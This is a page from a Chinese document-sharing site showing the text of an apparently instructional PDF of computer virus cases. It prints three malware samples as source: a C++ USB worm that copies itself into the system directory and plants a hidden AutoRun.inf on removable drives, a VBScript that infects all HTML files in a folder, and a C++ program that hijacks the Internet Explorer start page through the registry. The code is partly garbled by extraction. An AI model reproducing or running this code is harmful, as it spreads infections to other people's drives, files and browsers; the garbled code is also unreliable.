欢迎来到淘文阁 - 分享文档赚钱的网站! | 帮助中心 好文档才是您的得力助手!
淘文阁 - 分享文档赚钱的网站
全部分类
  • 研究报告>
  • 管理文献>
  • 标准材料>
  • 技术资料>
  • 教育专区>
  • 应用文书>
  • 生活休闲>
  • 考试试题>
  • pptx模板>
  • 工商注册>
  • 期刊短文>
  • 图片设计>
  • ImageVerifierCode 换一换

    2022年2022年计算机病毒案例 2.pdf

    • 资源ID:34875761       资源大小:41.20KB        全文页数:5页
    • 资源格式: PDF        下载积分:4.3金币
    快捷下载 游客一键下载
    会员登录下载
    微信登录下载
    三方登录下载: 微信开放平台登录   QQ登录  
    二维码
    微信扫一扫登录
    下载资源需要4.3金币
    邮箱/手机:
    温馨提示:
    快捷下载时,用户名和密码都是您填写的邮箱或者手机号,方便查询和重复下载(系统自动生成)。
    如填写123,账号就是123,密码也是123。
    支付方式: 支付宝    微信支付   
    验证码:   换一换

     
    账号:
    密码:
    验证码:   换一换
      忘记密码?
        
    友情提示
    2、PDF文件下载后,可能会被浏览器默认打开,此种情况可以点击浏览器菜单,保存网页到桌面,就可以正常下载了。
    3、本站不支持迅雷下载,请使用电脑自带的IE浏览器,或者360浏览器、谷歌浏览器下载即可。
    4、本站资源下载后的文档和图纸-无水印,预览文档经过压缩,下载后原文更清晰。
    5、试题试卷类文档,如果标题没有明确说明有答案则都视为没有答案,请知晓。

    2022年2022年计算机病毒案例 2.pdf

    一、U盘病毒AutoRun.inf 文件AutoRun open=proj7_2.exe shellopen=打开(&O) shellopenCommand=proj7_2.exe shellexplore=我的资源管理器 (&X) shellexploreCommand=proj7_2.exe proj7_2.cpp 案例名称: U 盘恶意代码程序名称: proj7_2.cpp #include stdafx.h bool SaveToFile(char* Path,char* Data) HANDLE hFile; hFile=CreateFile(Path, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL,NULL); if(hFile=INVALID_HANDLE_VALUE)/*continue; /出错时处理 */ DWORD dwWrite; WriteFile(hFile,Data,strlen(Data),&dwWrite,NULL); CloseHandle(hFile); return true; BOOL InfectU() while(true) UINT revtype; char name256=H: ; char szName256=0; char toPath256=0; char infPath256=0; char openU80=0; 名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 1 页,共 5 页 - - - - - - - - - /遍历所有盘符for(BYTE i=0 x42;i0 x5B;i=i+0 x01) name0=i; /得到盘符类型revtype=GetDriveType(name); /判断是否是可移动存储设备if (revtype=DRIVE_REMOVABLE) /得到自身文件路径GetModuleFileName(NULL,szName,256); /比较是否和 U 盘的盘符相同/如果相同说明在 U 盘上执行,复制到系统中去if(strncmp(name,szName,1)=0) /得到系统目录GetSystemDirectory(toPath,256); strcat(toPath,proj7_2.exe); /把自身文件复制到系统目录if(CopyFile(szName,toPath,TRUE) /运行程序WinExec(toPath,0); strcpy(openU,explorer ); strcat(openU,name); /打开U 盘WinExec(openU,1); return 0; / 如果不是在 U 盘上执行,则感染 U 盘else strcpy(toPath,name); strcat(toPath,proj7_2.exe); strcpy(infPath,name); strcat(infPath,AutoRun.inf); /还原U 盘上的文件属性SetFileAttributes(toPath,FILE_ATTRIBUTE_NORMAL); 名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 2 页,共 5 页 - - - - - - - - - SetFileAttributes(infPath,FILE_ATTRIBUTE_NORMAL); /删除原有文件DeleteFile(toPath); DeleteFile(infPath); /写AutoRun.inf 到U 盘char* Data; Data = AutoRunrnopen=proj7_2.exernshellopen= 打开(&O)rnshellexplore= 我的资源管理器(&X)rnshellexploreCommand=proj7_2.exe; SaveToFile(infPath,Data); /拷贝自身文件到 U 盘CopyFile(szName,toPath,FALSE); /把这两个文件设置成系统,隐藏属性SetFileAttributes(toPath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM); SetFileAttributes(infPath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM); /休眠60 秒,60 检测一次Sleep(60000); int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) InfectU(); return 0; 名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 3 页,共 5 页 - - - - - - - - - 二、脚本病毒案例名称:脚本病毒程序名称: Misery.vbs 遇到错误继续执行On error resume next 遇到错误继续执行On error resume next 定义变量Dim fso,curfolder,curfile 定一个文件操作对象Set fso = createobject(scripting.filesystemobject) 得到当前目录Set curfolder = fso.GetFolder(.) 得到当前目录的文件set files = curfolder.files 文件的打开方式Const ForReading = 1, ForWriting = 2, ForAppending = 8 向所有扩展名为 htm/HTM/html/HTML 的文件中写代码for each file in Files if UCase(right(file.name,3) = HTM or UCase(right(file.name,4) = HTML then curfile = curfolder & & file.name Set f = fso.OpenTextFile(curfile, ForAppending, True) f.Write vbcrlf f.Write & vbcrlf f.Write MsgBox 你中旧痛苦岁月病毒了! & vbcrlf f.Write Set r=CreateObject(Wscript.Shell) & vbcrlf f.Write r.run(notepad.exe) & vbcrlf f.Write end if next f.Close 名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 4 页,共 5 页 - - - - - - - - - 三、案例名称:浏览器恶意代码程序名称: proj7_1.cpp #include #include main() HKEY hKey1; DWORD dwDisposition; LONG lRetCode; /创建lRetCode = RegCreateKeyEx ( HKEY_LOCAL_MACHINE, SOFTWAREMicrosoftInternet ExplorerMain, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_WRITE, NULL, &hKey1, &dwDisposition); /如果创建失败,显示出错信息if (lRetCode != ERROR_SUCCESS) printf (Error in creating keyn); return (0) ; /设置键值lRetCode = RegSetValueEx ( hKey1, Default_Page_URL, 0, REG_SZ, (byte*)http:/, 100); /如果创建失败,显示出错信息if (lRetCode != ERROR_SUCCESS) printf ( Error in setting valuen); return (0) ; printf( 注册表编写成功! n); return(0); 名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 5 页,共 5 页 - - - - - - - - -

    注意事项

    本文(2022年2022年计算机病毒案例 2.pdf)为本站会员(Che****ry)主动上传,淘文阁 - 分享文档赚钱的网站仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知淘文阁 - 分享文档赚钱的网站(点击联系客服),我们立即给予删除!

    温馨提示:如果因为网速或其他原因下载失败请重新下载,重复下载不扣分。




    关于淘文阁 - 版权申诉 - 用户使用规则 - 积分规则 - 联系我们

    本站为文档C TO C交易模式,本站只提供存储空间、用户上传的文档直接被用户下载,本站只是中间服务平台,本站所有文档下载所得的收益归上传人(含作者)所有。本站仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。若文档所含内容侵犯了您的版权或隐私,请立即通知淘文阁网,我们立即给予删除!客服QQ:136780468 微信:18945177775 电话:18904686070

    工信部备案号:黑ICP备15003705号 © 2020-2023 www.taowenge.com 淘文阁 

    收起
    展开